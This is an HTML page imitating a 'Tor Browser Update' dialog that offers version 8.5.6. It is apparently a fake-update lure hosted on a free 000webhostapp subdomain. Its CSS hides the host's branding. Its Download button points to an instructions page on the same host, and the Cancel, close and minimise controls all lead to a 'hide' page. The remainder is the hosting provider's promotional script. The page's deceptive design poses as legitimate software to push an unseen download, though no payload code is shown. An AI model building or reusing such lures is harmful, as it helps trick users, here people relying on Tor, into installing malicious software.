<html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8"><style>
img[alt*="000webhost"],img[alt*="000webhost"][style],img[src*="000webhost"],img[src*="000webhost"][style],body > div:nth-last-of-type(1)[style]{opacity: 0 !important;pointer-events:none !important;width: 0px !important;height: 0px !important;visibility:hidden !important;display:none !important;}
body {
 background-image: url("https://i.gyazo.com/b14af608243d8498d049039fc7d61998.png");
 background-repeat: no-repeat
}
.windowtitle {
 position: absolute;
 top: 34px;
 left: 15px;
 font-family: Arial;
 font-size: 12px;
 font-weight: bold
}
.info {
 position: absolute;
 top: 75px;
 left: 12px;
 font-family: Arial;
 font-size: 12px
}
.min {
 position: absolute;
 top: 0px;
 left: 565px;
 background-color: inherit;
 padding: 12px 22px;
}
.min:hover {
 opacity: 0.7; 
 background-color: #d1d1d1;
 border: 1px solid #d1d1d1;
}
.close {
 position: absolute;
 top: 0px;
 left: 656px;
 background-color: inherit;
 padding: 12px 22px;
}
.close:hover {
 opacity: 0.7;
 background-color: #ff0019;
 border: 1px solid #ff0019;
}
.cancel {
 position: absolute;
 top: 399px;
 left: 614px;
}
.update {
 position: absolute;
 top: 399px;
 left: 15px;
}
.button {
 font: bold 12px Arial;
 text-decoration: none;
 background-color: #e0e0e0;
 color: #000000;
 padding: 5px 12px;
 border-top: 1px ridge #5a5a5a;
 border-left: 1px ridge #5a5a5a;
 border-right: 1px solid #141414;
 border-bottom: 1px solid #141414;
}
.button:hover {
 background-color: #d8ecf0;
 padding: 4px 11px;
 border: 2px solid #508ce6;
}
</style>

</head><body>
<div class="windowtitle">Tor Browser Update</div>

<div class="info">
New update found: <b>Tor Browser 8.5.6</b> (Firefox 60.9.0.7005)
<br><br>
<iframe src="update_data/content.html" name="_d" scrolling="no" style="border: none; background: #F0F0F0; width: 675; height: 280"></iframe>
</div>
<a href="https://unrestrainable-chea.000webhostapp.com/update/instruct.html" target="_d" class="update button">Download</a>
<a href="https://unrestrainable-chea.000webhostapp.com/update/hide.html" class="cancel button">&nbsp;Cancel&nbsp;</a>
<a href="https://unrestrainable-chea.000webhostapp.com/update/hide.html" class="close"></a>
<a href="https://unrestrainable-chea.000webhostapp.com/update/hide.html" class="min"></a>
<br><br><br><br><br>
<div style="text-align: right;position: fixed;z-index:9999999;bottom: 0;width: auto;right: 1%;cursor: pointer;line-height: 0;display:block !important;"><a title="Hosted on free web hosting 000webhost.com. Host your own website for FREE." target="_blank" href="https://www.000webhost.com/?utm_source=000webhostapp&amp;utm_campaign=000_logo&amp;utm_medium=website&amp;utm_content=footer_img"><img src="update_data/footer-powered-by-000webhost-white2.html" alt="www.000webhost.com"></a></div><script>function getCookie(e){for(var t=e+"=",n=decodeURIComponent(document.cookie).split(";"),o=0;o<n.length;o++){for(var i=n[o];" "==i.charAt(0);)i=i.substring(1);if(0==i.indexOf(t))return i.substring(t.length,i.length)}return""}getCookie("hostinger")&&(document.cookie="hostinger=;expires=Thu, 01 Jan 1970 00:00:01 GMT;",location.reload());var notification=document.getElementsByClassName("notice notice-success is-dismissible"),hostingerLogo=document.getElementsByClassName("hlogo"),mainContent=document.getElementsByClassName("notice_content")[0],newList=["Powerful and Easy-To-Use Control Panel.","1-Click Auto Installer and 24/7 Live Support.","Free Domain, Email and SSL Bundle.","5x faster WordPress performance","Weekly Backups and Fast Response Time."];if(notification.length>0&&null!=mainContent){var googleFont=document.createElement("link");googleFontHref=document.createAttribute("href"),googleFontRel=document.createAttribute("rel"),googleFontHref.value="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600",googleFontRel.value="stylesheet",googleFont.setAttributeNode(googleFontHref),googleFont.setAttributeNode(googleFontRel);var css="@media only screen and (max-width: 768px) {.web-hosting-90-off-image-wrapper {position: absolute;} .notice_content {justify-content: center;} .web-hosting-90-off-image {opacity: 0.3;}} @media only screen and (min-width: 769px) {.notice_content {justify-content: space-between;} .web-hosting-90-off-image-wrapper {padding: 0 5%}} .content-wrapper {z-index: 5} .notice_content {display: flex; align-items: center;} * {-webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;} .upgrade_button_red_sale{border: 0; border-radius: 3px; background-color: #ff123a !important; padding: 15px 55px !important; margin-left: 30px; font-family: 'Open Sans', sans-serif; font-size: 16px; font-weight: 600; color: #ffffff;} .upgrade_button_red_sale:hover{color: #ffffff !important; background: #d10303 !important;}",style=document.createElement("style"),sheet=window.document.styleSheets[0];style.styleSheet?style.styleSheet.cssText=css:style.appendChild(document.createTextNode(css)),document.getElementsByTagName("head")[0].appendChild(style),document.getElementsByTagName("head")[0].appendChild(googleFont);var button=document.getElementsByClassName("upgrade_button_red")[0],link=button.parentElement;link.setAttribute("href","https://www.hostinger.com/hosting-starter-offer?utm_source=000webhost&utm_medium=panel&utm_campaign=000-wp"),link.innerHTML='<button class="upgrade_button_red_sale">TRANSFER NOW</button>',(notification=notification[0]).setAttribute("style","padding-bottom: 10px; padding-top: 5px; background-image: url(https://cdn.000webhost.com/000webhost/promotions/springsale/mountains-neon-background.jpg); background-color: #000000; background-size: cover; background-repeat: no-repeat; color: #ffffff; border-color: #ff123a; border-width: 8px;"),notification.className="notice notice-error is-dismissible",(hostingerLogo=hostingerLogo[0]).setAttribute("src","https://cdn.000webhost.com/000webhost/promotions/springsale/logo-hostinger-white.svg"),hostingerLogo.setAttribute("style","float: none !important; height: auto; max-width: 100%; margin: 40px 20px 10px 30px;");var h1Tag=notification.getElementsByTagName("H1")[0];h1Tag.remove();var paragraph=notification.getElementsByTagName("p")[0];paragraph.innerHTML="Fast & Secure Web Hosting. <br>Limited time offer: get an SSL certificate for FREE",paragraph.setAttribute("style",'max-width: 600px; margin-left: 30px; font-family: "Open Sans", sans-serif; font-size: 16px; font-weight: 600;');var list=notification.getElementsByTagName("UL")[0];list.setAttribute("style","max-width: 675px;");for(var listElements=list.getElementsByTagName("LI"),i=0;i<newList.length;i++)listElements[i].setAttribute("style","color:#ffffff; list-style-type: disc; margin-left: 30px; font-family: 'Open Sans', sans-serif; font-size: 14px; font-weight: 300; line-height: 1.5;"),listElements[i].innerHTML=newList[i];listElements[listElements.length-1].remove();var org_html=mainContent.innerHTML,new_html='<div class="content-wrapper">'+mainContent.innerHTML+'</div><div class="web-hosting-90-off-image-wrapper"><img class="web-hosting-90-off-image" src="https://cdn.000webhost.com/000webhost/promotions/springsale/web-hosting-90-off.png"></div>';mainContent.innerHTML=new_html;var saleImage=mainContent.getElementsByClassName("web-hosting-90-off-image")[0]}</script></body></html>